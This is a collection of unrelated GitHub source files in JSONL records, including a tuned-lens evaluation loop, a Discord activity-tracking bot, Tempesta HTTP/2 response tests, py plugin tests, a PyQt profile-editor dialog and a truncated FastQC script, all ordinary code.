position=self.dist.rank, total=total)\n for batch in pbar:\n batch = self.dist.send_to_device(batch)\n output = model(**batch, output_hidden_states=True)\n\n hidden_states = output.hidden_states[:-1]\n\n final_lps = output.logits.log_softmax(dim=-1)\n\n final_probs = final_lps.exp()\n assert not th.isnan(output.logits).any(), \"Logits are NaN\"\n\n labels = shift_labels(batch[\"input_ids\"], self.token_shift)\n\n batch_output = _nested_dict()\n\n # Compute tuned lens eval and statistics if applicable\n for j, h in zip(range(L), hidden_states):\n self._evaluate_lenses_on_hidden(\n lenses=lenses,\n hidden=h,\n layer=j,\n final_probs=final_probs,\n final_lps=final_lps,\n labels=labels,\n batch_output=batch_output,\n total_layers=L,\n )\n\n batch_output[\"baseline\"][\"ce\"][\"final\"] = th.nn.functional.cross_entropy(\n shift_preds(final_lps, self.token_shift).flatten(0, 1),\n labels.flatten(),\n reduction=\"none\",\n )\n batch_output[\"baseline\"][\"entropy\"][\"final\"] = th.sum(\n -final_probs * final_lps, dim=-1\n )\n\n batches.append(pytree_map(th.mean, batch_output)) # type: ignore[arg-type]\n\n self._record_logit_stats_final(final_lps)\n\n pbar.close()\n agg = pytree_map(lambda x: nats_to_bpb * x.mean(), pytree_stack(batches))\n agg = pytree_map(lambda x: maybe_all_reduce(x), agg)\n agg = pytree_map(lambda x: x.cpu().numpy().item(), agg)\n\n assert isinstance(agg, dict)\n\n batches = pytree_map(lambda x: nats_to_bpb * x, batches)\n batches = pytree_map(lambda x: maybe_all_reduce(x), batches)\n batches = pytree_map(lambda x: x.cpu().item(), batches)\n assert isinstance(batches, list)\n\n logit_stats = self._save_logit_stats()\n\n if self.dist.primary:\n with (root_dir / \"batches.jsonl\").open(\"w\") as f:\n json.dump(batches, f)\n\n with (root_dir / \"aggregate_metrics.json\").open(\"w\") as f:\n json.dump(agg, f)\n\n if self.record_logit_stats:\n with (root_dir / \"logit_stats.json\").open(\"w\") as f:\n json.dump(logit_stats, f)\n","repo_name":"AlignmentResearch/tuned-lens","sub_path":"tuned_lens/scripts/eval_loop.py","file_name":"eval_loop.py","file_ext":"py","file_size_in_byte":11726,"program_lang":"python","lang":"en","doc_type":"code","stars":301,"dataset":"github-code","pt":"81"} +{"seq_id":"2877788308","text":"import json\n\nimport requests\n\nclass SetOfApis:\n\n def __init__(self, application_parameters, key, phone_or_qr, account_type):\n self.domain = application_parameters[\"domain\"]\n self.attraction = application_parameters[\"attraction\"]\n self.environment = application_parameters[\"environment\"]\n self.site_code = application_parameters[\"site_code\"]\n # self.country_code = GuestParameters.get_country_code_without_plus_prefix(key)\n self.phone_or_qr = phone_or_qr\n self.account_type = account_type\n\n def api_create_qr_user_request(self):\n end_point = f'https://api-{self.environment}.pomvom.com/api/v3/accounts'\n print(\"print end point: \" + str(end_point))\n data = {\"domain\": self.domain,\n \"uniqueId\": self.phone_or_qr}\n\n create_qr_user = requests.post(end_point,\n headers={\"x-api-key\": \"system\", \"x-client-id\": \"system\",\n \"Content-Type\": \"application/json\"},\n data=json.dumps(data),\n verify=False)\n \n response = create_qr_user.status_code\n return response","repo_name":"dimayedunov/qa-monitoring-service","sub_path":"src/api/set_of_apis.py","file_name":"set_of_apis.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9915971554","text":"import discord\nimport activity\nimport datetime\nimport charts\n#import main\n\nfrom quickchart import QuickChart\nfrom datetime import date\nfrom datetime import timezone\nfrom datetime import datetime\nfrom activity import activity\nfrom charts import chart\nfrom discord.ext import commands, tasks;\n\ntoken = 'hi'\n\nintents = discord.Intents.default()\nintents.message_content = True\nintents.members = True\nintents.presences = True\n\nclass MyBot(commands.Bot):\n @tasks.loop(seconds=5)\n async def memberStatus(ctx):\n \"\"\"\n Rough logic outline, outputs an entry to data after every event ends. \n \"\"\"\n for i in users:\n currA = get_user_activity(i)\n\n if (status[i.name] == None and currA != None):\n backup_time[i.name] = datetime.now(timezone.utc)\n\n last_check[i.name] = status[i.name]\n status[i.name] = currA\n\n\n if (last_check[i.name] != None and status[i.name] == None):\n #print(\" -------------------------------------- hat\") \n #if (last_check[i.name].start == None): data[i.name].append(activity(backup_time[i.name], datetime.now(timezone.utc), last_check[i.name].name))\n data[i.name].append(activity(backup_time[i.name], datetime.now(timezone.utc), last_check[i.name].name))\n #else: data[i.name].append(activity(last_check[i.name].start, datetime.now(timezone.utc), last_check[i.name].name))\n #data[i.name].append(1)\n\n print('added!') \n #print(\"running!\")\n \n\nbot = MyBot(command_prefix='>', intents=intents)\n\n\"\"\"\nAll the events must be a coroutine. If they aren’t, \nthen you might get unexpected errors. In order to \nturn a function into a coroutine they must be async\ndef functions.\n\"\"\"\n\nusers = []\nstatus: dict[str, discord.Activity] = {}\nlast_check: dict[str, discord.Activity] = {}\nbackup_time: dict[str, datetime] = {}\ndata: dict[str, list] = {}\n#presentation: dict[str, dict[str, list]] = {}\n\ndef get_user_activity(i : discord.Member) -> discord.Activity:\n if (len(i.activities) > 0 and i.activities[0].type != discord.ActivityType.custom):\n return i.activities[0]\n else:\n return None\n\n@bot.event\nasync def on_ready():\n print(f'Logged on as {bot.user.name} \\n ---------')\n for i in bot.get_all_members():\n users.append(i)\n status[i.name] = get_user_activity(i)\n last_check[i.name] = None\n data[i.name] = []\n backup_time[i.name] = datetime.now(timezone.utc)\n bot.memberStatus.start()\n\n@bot.event\nasync def on_member_join(member):\n users.append(member)\n status[member.name] = member.activities\n last_check[member.name] = None\n \n@bot.command()\nasync def members(ctx):\n for i in users:\n await ctx.send(i.name)\n\n@bot.command()\nasync def ping(ctx):\n await ctx.send('pong')\n\n@bot.command()\nasync def info(ctx):\n for i in users:\n if (len(i.activities) > 0 and i.activities[0].type != discord.ActivityType.custom):\n\n #await ctx.send(data[i.name].size())\n await ctx.send(i.activities[0].name)\n else:\n await ctx.send(\"no activities\")\n\n@bot.command()\nasync def show_data(ctx):\n await ctx.send(data.items())\n await ctx.send('hi there')\n #for i in users:\n #if (data.get(i.name) != None):\n #await ctx.send(data[i.name])\n\n@bot.command()\nasync def chart(ctx):\n for key in users:\n activities = data[key.name]\n activity_names = []\n activity_times = []\n\n ###\n\n presentation = {}\n for i in activities:\n if (i.name in presentation):\n presentation[i.name] += i.time.total_seconds() / 60\n else:\n presentation[i.name] = i.time.total_seconds() / 60\n\n for i in presentation:\n activity_names.append(i)\n activity_times.append(presentation[i])\n print(presentation[i] * 60)\n\n ###\n\n qc = QuickChart()\n qc.config = {\n \"type\": \"bar\",\n \"data\": {\n \"type\": \"bar\",\n \"labels\": activity_names,\n \"datasets\": [{\n \"label\": \"screentime\",\n \"data\": activity_times\n\n }]\n }\n }\n\n # Print a chart URL\n #await ctx.send(key.name + \": \" + qc.get_url())\n\n # Print a short chart URL\n await ctx.send(key.name + \": \" + qc.get_short_url())\n\nbot.run(token)","repo_name":"fc4furret/screentime","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26955943292","text":"# # https://leetcode.com/problems/subsets-ii/\n# 90. Subsets II\n# Medium\n# 9K\n# 254\n# Companies\n# Given an integer array nums that may contain duplicates, return all possible \n# subsets\n# (the power set).\n\n# The solution set must not contain duplicate subsets. Return the solution in any order.\n\n \n\n# Example 1:\n\n# Input: nums = [1,2,2]\n# Output: [[],[1],[1,2],[1,2,2],[2],[2,2]]\n# Example 2:\n\n# Input: nums = [0]\n# Output: [[],[0]]\n\nfrom typing import List\ndef subsets2( nums: List[int]) -> List[List[int]]:\n n=len(nums)\n subsets=[]\n nums.sort()\n def dfs(idx, path):\n subsets.append(path)\n for i in range(idx, n):\n if i > idx and nums[i] == nums[i-1]:\n continue\n dfs(i+1, path+ [nums[i]])\n dfs(0, [])\n return subsets\n\nif __name__ == \"__main__\":\n nums = [1,2,2]\n print (\"{}\".format(subsets2(nums)))\n\n\n\n","repo_name":"smohapatra1/scripting","sub_path":"python/practice/start_again/2023/09212023/backtracking_subsetsII.py","file_name":"backtracking_subsetsII.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36491562818","text":"'''Գրել ծրագիր, որը օգտատիրոջից սպասում է մուտք՝ բառերի ցանկ, մինչև օգտագործողը թողնի մուտքագրման տողը դատարկ: \r\nԴրանից հետո օգտատիրոջ մուտքագրած բառերը պետք է ցուցադրվեն էկրանին, բայց առանց կրկնությունների՝ յուրաքանչյուրը մեկ անգամ։ \r\nԱյս դեպքում բառերը պետք է ցուցադրվեն նույն հաջորդականությամբ, որով դրանք մուտքագրվել են ստեղնաշարից'''\r\ndef words(lst):\r\n new_lst = []\r\n for i in lst:\r\n if i not in new_lst:\r\n new_lst.append(i)\r\n return new_lst[:-1]\r\n\r\ndef lstt(w):\r\n while w != '':\r\n w = input('enter the word: ')\r\n ml.append(w)\r\n return words(ml)\r\n\r\nml = []\r\nw = input('enter the word: ')\r\nml.append(w)\r\nprint(lstt(w))","repo_name":"Gohar00/Exercices","sub_path":"input_word_while.py","file_name":"input_word_while.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"hy","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26892666417","text":"import sys\nimport re\nIN = open('words.hist', 'r')\ndict = []\nfor line in IN:\n word = line.split(' ')[1]\n #print(word)\n re.sub('[,.]', '', word)\n dict.append(word.strip('\\n'))\n#print(repr(dict))\ninput = sys.stdin.read()\nwords = input.split(' ')\noutput = []\n\nfor w in words:\n realw = w.strip( '[.,]' )\n #print(realw)\n if realw not in dict:\n w = '*'+w\n output.append(w)\n\nchecked = ' '.join(output)\nprint(checked)\n","repo_name":"mwrea/SP19-LING-L245","sub_path":"01/spellchecker.py","file_name":"spellchecker.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"9668755130","text":"\"\"\"Test module for http2 responses.\"\"\"\nimport http\n\nfrom framework import tester\n\n__author__ = \"Tempesta Technologies, Inc.\"\n__copyright__ = \"Copyright (C) 2023 Tempesta Technologies, Inc.\"\n__license__ = \"GPL2\"\n\n\nclass H2ResponsesTestCase(tester.TempestaTest):\n clients = [\n {\n \"id\": \"curl\",\n \"type\": \"curl\",\n \"http2\": True,\n \"addr\": \"${tempesta_ip}:8765\",\n },\n ]\n\n tempesta = {\n \"config\": \"\"\"\n listen ${tempesta_ip}:8765 proto=h2;\n\n srv_group default {\n server ${server_ip}:8000;\n }\n\n vhost v_good {\n proxy_pass default;\n }\n tls_match_any_server_name;\n tls_certificate ${tempesta_workdir}/tempesta.crt;\n tls_certificate_key ${tempesta_workdir}/tempesta.key;\n cache 0;\n cache_fulfill * *;\n block_action attack reply;\n block_action error reply;\n http_chain {\n host == \"bad.com\"\t-> block;\n host == \"good.com\" -> v_good;\n }\n \"\"\",\n }\n\n backends = [\n {\n \"id\": \"nginx\",\n \"type\": \"nginx\",\n \"port\": \"8000\",\n \"status_uri\": \"http://${server_ip}:8000/nginx_status\",\n \"config\": \"\"\"\n pid ${pid};\n worker_processes auto;\n events {\n worker_connections 1024;\n use epoll;\n }\n http {\n keepalive_timeout ${server_keepalive_timeout};\n keepalive_requests ${server_keepalive_requests};\n sendfile on;\n tcp_nopush on;\n tcp_nodelay on;\n open_file_cache max=1000;\n open_file_cache_valid 30s;\n open_file_cache_min_uses 2;\n open_file_cache_errors off;\n error_log /dev/null emerg;\n access_log off;\n server {\n listen ${server_ip}:8000;\n location / {\n return 200;\n }\n location /nginx_status {\n stub_status on;\n }\n }\n }\n \"\"\",\n },\n ]\n\n def __setup_h2_responses_test(self):\n curl = self.get_client(\"curl\")\n self.start_all_servers()\n self.start_tempesta()\n return curl\n\n def __test_h2_response(self, curl, header_name, header_value, status):\n curl.headers[header_name] = header_value\n curl.start()\n self.wait_while_busy(curl)\n curl.stop()\n response = curl.last_response\n self.assertEqual(response.status, status)\n\n def test_h2_bad_host(self):\n curl = self.__setup_h2_responses_test()\n # perform and check `bad` request\n self.__test_h2_response(curl, \"Host\", \"bad.com\", http.HTTPStatus.FORBIDDEN)\n\n def test_h2_bad_header(self):\n curl = self.__setup_h2_responses_test()\n\n # perform and check `good` request.\n self.__test_h2_response(curl, \"Host\", \"good.com\", http.HTTPStatus.OK)\n # add invalid cookie header and check response.\n self.__test_h2_response(curl, \"cookie\", \"AAAAAA//dfsdf\", http.HTTPStatus.BAD_REQUEST)\n\n def test_h2_bad_forwarded_for_ip(self):\n curl = self.__setup_h2_responses_test()\n\n # perform request with invalid X-Forwarded-For header\n self.__test_h2_response(curl, \"X-Forwarded-For\", \"1.1.1.1.1.1\", http.HTTPStatus.BAD_REQUEST)\n","repo_name":"tempesta-tech/tempesta-test","sub_path":"http2_general/test_h2_responses.py","file_name":"test_h2_responses.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"9151441291","text":"\nimport py\nimport os\nfrom py._com import PyPlugins, MultiCall\n\npytest_plugins = \"xfail\"\n\nclass TestMultiCall:\n def test_uses_copy_of_methods(self):\n l = [lambda: 42]\n mc = MultiCall(l)\n l[:] = []\n res = mc.execute()\n return res == 42\n\n def test_call_passing(self):\n class P1:\n def m(self, __call__, x):\n assert __call__.currentmethod == self.m \n assert len(__call__.results) == 1\n assert not __call__.methods\n return 17\n\n class P2:\n def m(self, __call__, x):\n assert __call__.currentmethod == self.m \n assert __call__.args\n assert __call__.results == []\n assert __call__.methods\n return 23 \n \n p1 = P1() \n p2 = P2() \n multicall = MultiCall([p1.m, p2.m], 23)\n reslist = multicall.execute()\n assert len(reslist) == 2\n # ensure reversed order \n assert reslist == [23, 17]\n\n def test_optionalcallarg(self):\n class P1:\n def m(self, x):\n return x\n call = MultiCall([P1().m], 23)\n assert call.execute() == [23]\n assert call.execute(firstresult=True) == 23\n \n def test_call_subexecute(self):\n def m(__call__):\n subresult = __call__.execute(firstresult=True)\n return subresult + 1\n\n def n():\n return 1\n\n call = MultiCall([n, m])\n res = call.execute(firstresult=True)\n assert res == 2\n\n def test_call_exclude_other_results(self):\n def m(__call__):\n __call__.exclude_other_results()\n return 10\n\n def n():\n return 1\n\n call = MultiCall([n, n, m, n])\n res = call.execute()\n assert res == [10]\n # doesn't really make sense for firstresult-mode - because\n # we might not have had a chance to run at all. \n #res = call.execute(firstresult=True)\n #assert res == 10\n \n\nclass TestPyPlugins:\n def test_MultiCall(self):\n plugins = PyPlugins()\n assert hasattr(plugins, \"MultiCall\")\n\n def test_register(self):\n plugins = PyPlugins()\n class MyPlugin:\n pass\n my = MyPlugin()\n plugins.register(my)\n assert plugins.getplugins() == [my]\n my2 = MyPlugin()\n plugins.register(my2)\n assert plugins.getplugins() == [my, my2]\n\n assert plugins.isregistered(my)\n assert plugins.isregistered(my2)\n plugins.unregister(my)\n assert not plugins.isregistered(my)\n assert plugins.getplugins() == [my2]\n\n def test_onregister(self):\n plugins = PyPlugins()\n l = []\n class MyApi:\n def pyevent_plugin_registered(self, plugin):\n l.append(plugin)\n def pyevent_plugin_unregistered(self, plugin):\n l.remove(plugin)\n myapi = MyApi()\n plugins.register(myapi)\n assert len(l) == 1\n assert l[0] is myapi \n plugins.unregister(myapi)\n assert not l\n\n def test_call_methods(self):\n plugins = PyPlugins()\n class api1:\n def m(self, __call__, x):\n return x\n class api2:\n def m(self, __call__, x, y=33):\n return y \n plugins.register(api1())\n plugins.register(api2())\n res = plugins.call_firstresult(\"m\", x=5)\n assert plugins.call_firstresult(\"notexist\") is None\n\n assert res == 33\n reslist = plugins.call_each(\"m\", x=5)\n assert len(reslist) == 2\n assert 5 in reslist\n assert 33 in reslist\n assert plugins.call_each(\"notexist\") == []\n\n assert plugins.call_plugin(api1(), 'm', x=12) == 12\n assert plugins.call_plugin(api2(), 't') is None\n\n def test_call_none_is_no_result(self):\n plugins = PyPlugins()\n class api1:\n def m(self):\n return None\n class api2:\n def m(self, __call__):\n return 41\n plugins.register(api1())\n plugins.register(api1())\n plugins.register(api2())\n assert plugins.call_firstresult('m') == 41\n assert plugins.call_each('m') == [41]\n\n def test_call_noneasresult(self):\n plugins = PyPlugins()\n class api1:\n def m(self, __call__):\n return __call__.NONEASRESULT\n plugins.register(api1())\n plugins.register(api1())\n assert plugins.call_firstresult('m') is None\n assert plugins.call_each('m') == [None, None]\n\n def test_listattr(self):\n plugins = PyPlugins()\n class api1:\n x = 41\n class api2:\n x = 42\n class api3:\n x = 43\n plugins.register(api1())\n plugins.register(api2())\n plugins.register(api3())\n l = list(plugins.listattr('x'))\n assert l == [41, 42, 43]\n l = list(plugins.listattr('x', reverse=True))\n assert l == [43, 42, 41]\n\n def test_notify_anonymous_ordered(self):\n plugins = PyPlugins()\n l = []\n class api1:\n def pyevent_hello(self): \n l.append(\"hellospecific\")\n class api2:\n def pyevent(self, name, *args): \n if name == \"hello\":\n l.append(name + \"anonymous\") \n plugins.register(api1())\n plugins.register(api2())\n plugins.notify('hello')\n assert l == [\"hellospecific\", \"helloanonymous\"]\n\n def test_consider_env(self, monkeypatch):\n plugins = PyPlugins()\n monkeypatch.setitem(os.environ, 'PYLIB', \"unknownconsider_env\")\n py.test.raises(ImportError, \"plugins.consider_env()\")\n\n def test_consider_module(self):\n plugins = PyPlugins()\n mod = py.std.new.module(\"temp\")\n mod.pylib = [\"xxx nomod\"]\n excinfo = py.test.raises(ImportError, \"plugins.consider_module(mod)\")\n mod.pylib = \"os\"\n class Events(list):\n def pyevent_importingmodule(self, mod):\n self.append(mod)\n l = Events()\n plugins.register(l)\n plugins.consider_module(mod)\n assert len(l) == 1\n assert l[0] == (mod.pylib)\n\ndef test_api_and_defaults():\n assert isinstance(py._com.pyplugins, PyPlugins)\n\ndef test_subprocess_env(testdir, monkeypatch):\n plugins = PyPlugins()\n old = py.path.local(py.__file__).dirpath().dirpath().chdir()\n try:\n monkeypatch.setitem(os.environ, \"PYLIB\", 'unknownconsider')\n excinfo = py.test.raises(py.process.cmdexec.Error, \"\"\"\n py.process.cmdexec('%s -c \"import py\"')\n \"\"\" % py.std.sys.executable)\n assert str(excinfo.value).find(\"ImportError\") != -1\n assert str(excinfo.value).find(\"unknownconsider\") != -1\n finally:\n old.chdir()\n\nclass TestPyPluginsEvents:\n def test_pyevent_named_dispatch(self):\n plugins = PyPlugins()\n l = []\n class A:\n def pyevent_name(self, x): \n l.append(x)\n plugins.register(A())\n plugins.notify(\"name\", 13)\n assert l == [13]\n\n def test_pyevent_anonymous_dispatch(self):\n plugins = PyPlugins()\n l = []\n class A:\n def pyevent(self, name, *args, **kwargs): \n if name == \"name\":\n l.extend([args, kwargs])\n\n plugins.register(A())\n plugins.notify(\"name\", 13, x=15)\n assert l == [(13, ), {'x':15}]\n\n","repo_name":"woodrow/pyoac","sub_path":"py/misc/testing/test_com.py","file_name":"test_com.py","file_ext":"py","file_size_in_byte":7556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"42321661695","text":"import os\nimport time\n\nft=open('D:\\\\text.txt')\ns=ft.read()\nprint(s)\n\n'''\n#file_object = open('test.txt') \n#//不要把open放在try中,以防止打开失败,那么就不用关闭了\ntry:\n file_context = file_object.read() \n //file_context是一个string,读取完后,就失去了对test.txt的文件引用\n # file_context = open(file).read().splitlines() \n // file_context是一个list,每行文本内容是list中的一个元素\n\nfinally:\n file_object.close()\n\n//除了以上方法,也可用with、contextlib都可以打开文件,且自动关闭文件,\n//以防止打开的文件对象未关闭而占用内存\n\n'''\n\nt=time.time()\nt=int(t)\nprint(t)\nft=open('D:\\\\text.txt','w')\nft.write(str(t))\nft=open('D:\\\\text.txt')\nftt=ft.read()\nprint(ftt)\ntime.sleep(2)\n\ndef biaoji_time():\n t=time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n t=time.time()\n t=int(t)\n ft=open('D:\\\\text.txt','w')\n ft.write(str(t))\n ft.close()\n\nbiaoji_time()","repo_name":"woshichenya/hezi","sub_path":"All/python_all/PythonTongyong/txt2.py","file_name":"txt2.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7615652983","text":"import pickle\nfrom typing import Optional\n\nimport emoji\nfrom PyQt6.QtCore import Qt, QMimeData, QObject, QEvent, QByteArray\nfrom PyQt6.QtGui import QDrag, QMouseEvent\nfrom PyQt6.QtWidgets import QDialog, QToolButton\nfrom overrides import overrides\nfrom qthandy import ask_confirmation\n\nfrom src.main.python.plotlyst.core.domain import Novel\nfrom src.main.python.plotlyst.core.template import age_field, \\\n enneagram_field, TemplateField, TemplateFieldType, ProfileTemplate, misbelief_field, \\\n default_character_profiles, mbti_field, traits_field\nfrom src.main.python.plotlyst.model.template import TemplateFieldSelectionModel\nfrom src.main.python.plotlyst.service.persistence import RepositoryPersistenceManager\nfrom src.main.python.plotlyst.view.common import emoji_font\nfrom src.main.python.plotlyst.view.generated.character_profile_editor_dialog_ui import Ui_CharacterProfileEditorDialog\nfrom src.main.python.plotlyst.view.icons import IconRegistry\nfrom src.main.python.plotlyst.view.widget.template.profile import ProfileTemplateEditor\n\n\nclass CharacterProfileEditorDialog(Ui_CharacterProfileEditorDialog, QDialog):\n MimeType: str = 'application/template-field'\n\n def __init__(self, profile: ProfileTemplate, parent=None):\n super().__init__(parent)\n\n self.setupUi(self)\n self.profile = profile\n self._restore_requested: bool = False\n\n self.btnAge.setIcon(IconRegistry.from_name('mdi.numeric'))\n self.btnEnneagram.setIcon(IconRegistry.from_name('mdi.numeric-9-box-outline'))\n self.btnMbti.setIcon(IconRegistry.from_name('ei.group-alt'))\n self.btnTraits.setIcon(IconRegistry.from_name('ei.adjust'))\n self.btnMisbelief.setIcon(IconRegistry.error_icon())\n self.btnCustomText.setIcon(IconRegistry.from_name('mdi.format-text'))\n self.btnCustomNumber.setIcon(IconRegistry.from_name('mdi.numeric'))\n self.btnCustomChoices.setIcon(IconRegistry.from_name('mdi.format-list-bulleted-type'))\n\n self.btnSettings.setIcon(IconRegistry.from_name('ei.cog'))\n self.btnSettings.toggled.connect(self.wdgSettings.setVisible)\n\n self.profile_editor = ProfileTemplateEditor(self.profile)\n self.wdgEditor.layout().addWidget(self.profile_editor)\n\n self.btnRestore.setIcon(IconRegistry.restore_alert_icon('white'))\n self.btnRestore.clicked.connect(self._restore_default)\n\n for w in self.profile_editor.widgets:\n self._field_added(w.field)\n\n self._selected_field: Optional[TemplateField] = None\n\n self.profile_editor.fieldAdded.connect(self._field_added)\n self.profile_editor.fieldSelected.connect(self._field_selected)\n self.profile_editor.placeholderSelected.connect(self._placeholder_selected)\n self.btnRemove.setIcon(IconRegistry.minus_icon())\n self.btnRemove.clicked.connect(self._remove_field)\n\n self.lineLabel.textEdited.connect(self._label_edited)\n self.lineEmoji.setFont(emoji_font())\n self.lineEmoji.textEdited.connect(self._emoji_edited)\n\n self.btnAge.installEventFilter(self)\n self.btnEnneagram.installEventFilter(self)\n self.btnMbti.installEventFilter(self)\n self.btnTraits.installEventFilter(self)\n self.btnMisbelief.installEventFilter(self)\n self.btnCustomText.installEventFilter(self)\n self.btnCustomNumber.installEventFilter(self)\n self.btnCustomChoices.installEventFilter(self)\n\n self._dragged: Optional[QToolButton] = None\n self.cbShowLabel.clicked.connect(self._show_label_clicked)\n self.btnCancel.clicked.connect(self.reject)\n self.btnSave.clicked.connect(self.accept)\n\n self.stackedSettings.setCurrentWidget(self.pageInfo)\n\n @overrides\n def eventFilter(self, watched: QObject, event: QEvent) -> bool:\n self._dragged = watched\n if event.type() == QEvent.Type.MouseButtonPress:\n self.mousePressEvent(event)\n elif event.type() == QEvent.Type.MouseMove:\n self.mouseMoveEvent(event)\n elif event.type() == QEvent.Type.MouseButtonRelease:\n self.mouseReleaseEvent(event)\n return super().eventFilter(watched, event)\n\n @overrides\n def mousePressEvent(self, event: QMouseEvent):\n self._dragged = None\n\n @overrides\n def mouseMoveEvent(self, event: QMouseEvent):\n if event.buttons() & Qt.MouseButton.LeftButton and self._dragged and self._dragged.isEnabled():\n drag = QDrag(self._dragged)\n pix = self._dragged.grab()\n if self._dragged is self.btnAge:\n field = age_field\n elif self._dragged is self.btnEnneagram:\n field = enneagram_field\n elif self._dragged is self.btnMbti:\n field = mbti_field\n elif self._dragged is self.btnTraits:\n field = traits_field\n elif self._dragged is self.btnMisbelief:\n field = misbelief_field\n elif self._dragged is self.btnCustomText:\n field = TemplateField(name='Label', type=TemplateFieldType.TEXT, custom=True)\n elif self._dragged is self.btnCustomNumber:\n field = TemplateField(name='Label', type=TemplateFieldType.NUMERIC, custom=True, compact=True)\n elif self._dragged is self.btnCustomChoices:\n field = TemplateField(name='Label', type=TemplateFieldType.TEXT_SELECTION, custom=True, compact=True)\n else:\n field = TemplateField(name=self._dragged.text(), type=TemplateFieldType.TEXT)\n mimedata = QMimeData()\n mimedata.setData(self.MimeType, QByteArray(pickle.dumps(field)))\n drag.setMimeData(mimedata)\n drag.setPixmap(pix)\n drag.setHotSpot(event.pos())\n drag.destroyed.connect(self._dragDestroyed)\n drag.exec_()\n\n def display(self) -> Optional[ProfileTemplate]:\n result = self.exec()\n\n if result == QDialog.DialogCode.Rejected:\n return None\n if self._restore_requested:\n return default_character_profiles()[0]\n return self.profile_editor.profile()\n\n def _dragDestroyed(self):\n self._dragged = None\n\n def _field_added(self, field: TemplateField):\n self._enable_in_inventory(field, False)\n if field.custom:\n self.btnSettings.setChecked(True)\n\n def _enable_in_inventory(self, field: TemplateField, enabled: bool):\n if field.id == age_field.id:\n self.btnAge.setEnabled(enabled)\n elif field.id == enneagram_field.id:\n self.btnEnneagram.setEnabled(enabled)\n elif field.id == mbti_field.id:\n self.btnMbti.setEnabled(enabled)\n elif field.id == traits_field.id:\n self.btnTraits.setEnabled(enabled)\n elif field.id == misbelief_field.id:\n self.btnMisbelief.setEnabled(enabled)\n\n def _field_selected(self, field: TemplateField):\n self._selected_field = field\n self.stackedSettings.setCurrentWidget(self.pageSettings)\n self.btnRemove.setEnabled(True)\n self.cbShowLabel.setChecked(field.show_label)\n self.lineLabel.setText(field.name)\n if field.emoji:\n self.lineEmoji.setText(emoji.emojize(field.emoji))\n else:\n self.lineEmoji.clear()\n if field.custom:\n if field.type == TemplateFieldType.TEXT_SELECTION:\n self.wdgChoicesEditor.setModel(TemplateFieldSelectionModel(field))\n self.wdgChoicesEditor.setVisible(True)\n else:\n self.wdgChoicesEditor.setHidden(True)\n else:\n self.wdgChoicesEditor.setHidden(True)\n\n def _placeholder_selected(self):\n self._selected_field = None\n self.stackedSettings.setCurrentWidget(self.pageInfo)\n self.btnRemove.setDisabled(True)\n\n def _remove_field(self):\n self._enable_in_inventory(self._selected_field, True)\n self.profile_editor.removeSelected()\n self._selected_field = None\n self.stackedSettings.setCurrentWidget(self.pageInfo)\n self.btnRemove.setDisabled(True)\n\n def _restore_default(self):\n if ask_confirmation('Are you sure you want to restore the default profile? Your current changes will be lost.'):\n self._restore_requested = True\n self.accept()\n\n def _show_label_clicked(self, checked: bool):\n if self._selected_field:\n self._selected_field.show_label = checked\n self.profile_editor.setShowLabelForSelected(checked)\n if self._selected_field.custom:\n self.lineLabel.setEnabled(checked)\n\n def _label_edited(self, text: str):\n if self._selected_field:\n self._selected_field.name = text\n self.profile_editor.updateLabelForSelected(text)\n\n def _emoji_edited(self, emoji_str: str):\n alias = emoji.demojize(emoji_str)\n if alias.startswith(':'):\n self._selected_field.emoji = alias\n self.profile_editor.updateEmojiForSelected(alias)\n else:\n self.lineEmoji.clear()\n\n\ndef customize_character_profile(novel: Novel, index: int, parent=None) -> bool:\n profile = CharacterProfileEditorDialog(novel.character_profiles[index],\n parent).display()\n if profile:\n novel.character_profiles[index] = profile\n RepositoryPersistenceManager.instance().update_novel(novel)\n\n return True\n return False\n","repo_name":"plotlyst/plotlyst-app","sub_path":"src/main/python/plotlyst/view/dialog/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":9528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43323433834","text":"# encoding: utf-8\n#author: Tobias Andermann, tobias.andermann@bioenv.gu.se\n\"\"\"\nThis script runs a fastqc test on all fastq samples in a user-provided folder and creates an overview plot\n\"\"\"\n\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport os\nimport sys\nimport glob\nimport shutil\nimport configparser\nfrom .utils import CompletePath\nimport subprocess\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport zipfile\nimport collections\n\n\ndef add_arguments(parser):\n parser.add_argument(\n '--input',\n required=True,\n action=CompletePath,\n default=None,\n help='The directory containing fastq files'\n )\n parser.add_argument(\n '--cores',\n type=int,\n default=1,\n help='Number of computational cores for parallelization of computation.'\n )\n parser.add_argument(\n '--output',\n required=True,\n action=CompletePath,\n default=None,\n help='The output directory where quality-test results will be saved'\n )\n\ndef get_test_results(fastqc_log_content):\n test_results = [i for i in fastqc_log_content if i.startswith('>>')]\n test_names = [string.split('\\t')[0].replace('>>','') for string in test_results if not string == '>>END_MODULE']\n test_results = [string.split('\\t')[-1] for string in test_results if not string == '>>END_MODULE']\n return test_names,test_results\n\ndef plot_fastqc_results(fastqc_out_folder):\n zip_files = []\n for root, dirnames, filenames in os.walk(fastqc_out_folder):\n for filename in [i for i in filenames if '.zip' in i]:\n zip_files.append(os.path.join(root, filename))\n sample_test_results_dict = {}\n for file in zip_files:\n 